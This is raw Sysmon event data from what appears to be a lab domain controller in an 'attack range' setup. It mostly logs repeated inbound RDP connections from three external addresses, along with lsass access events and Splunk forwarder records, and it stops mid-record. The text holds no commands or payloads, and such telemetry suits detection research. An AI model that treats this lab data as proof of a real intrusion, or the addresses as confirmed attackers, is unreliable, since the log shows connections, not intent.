354300x800000000000000099673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.016{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-50704-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.952{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37858-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.709{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C892978DFAACAFDDBE273252125AB40F,SHA256=0381DE097E12EA4A6BA254E5FF68F0DB00343F4FED45B70D45CAAA817F04991A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000099697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BA68A27D14E71A8CEB0EE2591D9CF2A,SHA256=06103EEB01B947A182E6FD116C189521DA85DC589471B9006F1469662505C876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.078{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-45526-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.073{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-54346-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.914{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-54068-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.861{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-53956-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.808{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-41482-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.771{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44966-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.739{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-41332-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.698{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44790-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.677{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.380{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-40642-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.329{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-44088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.273{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-40378-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.189{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-52758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.106{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-43682-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
10341000x800000000000000099682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.240{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000099681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.240{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
23542300x800000000000000099703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.802{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0806B1C7B7815EA2F533A9988FF109F0,SHA256=9AF67EC55BAC6CA5D9CEA01DD34EECAD217E09A9D120EAD8FA3AD0F7A97BEE68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.016{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-47482-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.897{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-55750-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.735{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-43562-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.256{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-42498-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
23542300x800000000000000099727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.896{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1B65182A227B0D4238BA6AE072A596,SHA256=506E2271B9B0F7DFCB171FBA87564BD1189F6D928A5B9C55D601757E64489F41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000099726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.134{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46430-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.030{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57582-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.008{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49662-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.981{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57506-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.978{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46132-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.943{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49552-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.932{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57420-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.928{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-49524-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.904{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45952-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.742{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57130-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.700{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57084-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.675{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45528-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.609{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-45404-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server
354300x800000000000000099713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.602{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48882-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.595{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48860-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.540{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-48710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.227{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-47936-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.214{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-44588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.154{326FD73D-A254-6294-0D00-000000005502}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53337-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.154{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53337-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.105{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-44382-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.073{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53336-false10.0.1.12-8000- 354300x800000000000000099704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.051{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-56024-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.065{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse185.100.87.231-48276-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.049{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-59198-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.012{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48170-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.005{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51620-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.950{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51514-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.944{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-48038-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:07.921{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51438-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.919{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-51432-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.885{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58958-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.881{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47864-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.870{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58942-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.862{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
354300x800000000000000099750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.836{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58872-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.786{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47684-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.785{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58772-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.758{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58734-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.728{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47568-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.658{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse185.100.87.94-50896-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.604{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50798-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.592{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58514-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.583{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50758-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.577{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47304-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.559{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 